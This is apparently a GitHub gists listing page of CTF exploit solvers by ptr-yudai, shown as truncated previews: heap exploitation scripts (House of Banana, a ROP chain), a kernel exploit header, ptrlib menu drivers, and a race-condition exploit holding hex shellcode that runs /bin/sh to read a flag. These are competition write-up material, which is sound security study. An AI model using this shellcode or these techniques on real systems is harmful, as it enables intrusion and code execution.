Yudai ptr-yudai
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ptrlib import * | |
| from z3 import * | |
| """ | |
| typedef struct { | |
| char key[0xb0]; | |
| char iv[0x10]; // +B0h | |
| char flag[0x100]; | |
| }; | |
| """ |
ptr-yudai
/ solve_banana.py
Created
June 5, 2022 06:02
Example solver for Monkey Heap from SECCON Beginners CTF 2022 Online
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Monkey Heap - Beginners CTF 2022 Online | |
| Solution with House of Banana | |
| Pros: | |
| - Only one largebin attack required | |
| - Simple to understand | |
| Cons: | |
| - Require exit | |
| - Require address of ld and heap |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _GNU_SOURCE | |
| #include <fcntl.h> | |
| #include <pthread.h> | |
| #include <sched.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <sys/mman.h> | |
| #include <sys/syscall.h> | |
| #include <sys/timerfd.h> |
ptr-yudai
/ exploit.py
Last active
December 12, 2021 09:47
Official solution for pyast64++.pwn from SECCON 2021
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def get_overlap(): | |
| # [vuln] Return a local array out-of-scope | |
| return array(0x100) | |
| def f1(evil): | |
| # Create padding for ROP chain | |
| x = array(0xe0) | |
| f2(evil) | |
| def gadgets(): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import threading | |
| import datetime | |
| JST = datetime.timezone(datetime.timedelta(hours=+9), 'JST') | |
| challs = { | |
| "pwn": [ | |
| {"name": "BabyBOF:RCE", "port": 9001, "host": "pwn2.bsidesahmedabad.in", "release": datetime.datetime(2021, 11, 6, 12)}, | |
| {"name": "httpsaba", "port": 9080, "host": "pwn.bsidesahmedabad.in", "release": datetime.datetime(2021, 11, 6, 12, 30)}, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <fcntl.h> | |
| #include <string.h> | |
| #include <sys/mman.h> | |
| #include <sys/ioctl.h> | |
| unsigned long user_cs; | |
| unsigned long user_ss; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ptrlib import * | |
| """ | |
| typedef struct { | |
| unsigned long id; | |
| std::string candidate; | |
| std::string state; | |
| std::string gender; | |
| long age; | |
| bool employed; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ptrlib import * | |
| """ | |
| typedef struct { | |
| vector<Prisoner> people; | |
| int number; | |
| } PrisonManager; | |
| typedef struct { | |
| string name; | |
| long age; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| array<uint64> a = make_array<uint64>(4); | |
| array<uint64> b = make_array<uint64>(3); | |
| ref<array<uint64>> victim = new<array<uint64>>(); | |
| string shellcode = "\x31\xd2\x52\xe8\x1c\x00\x00\x00\x2f\x62\x69\x6e\x2f\x6c\x73\x20\x2d\x6c\x68\x61\x3b\x20\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67\x00\xe8\x03\x00\x00\x00\x2d\x63\x00\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x5f\x57\x48\x89\xe6\xb8\x3b\x00\x00\x00\x0f\x05\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05"; | |
| def void race() { | |
| int64 i = 0; | |
| while(1) { | |
| deref(victim) = a; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ptrlib import * | |
| def add(index, data): | |
| sock.sendlineafter("> ", "1") | |
| sock.sendlineafter(": ", str(index)) | |
| sock.sendlineafter(": ", data) | |
| def show(index): | |
| sock.sendlineafter("> ", "5") | |
| sock.sendlineafter(": ", str(index)) | |
| length = int(sock.recvlineafter(": ")) |
NewerOlder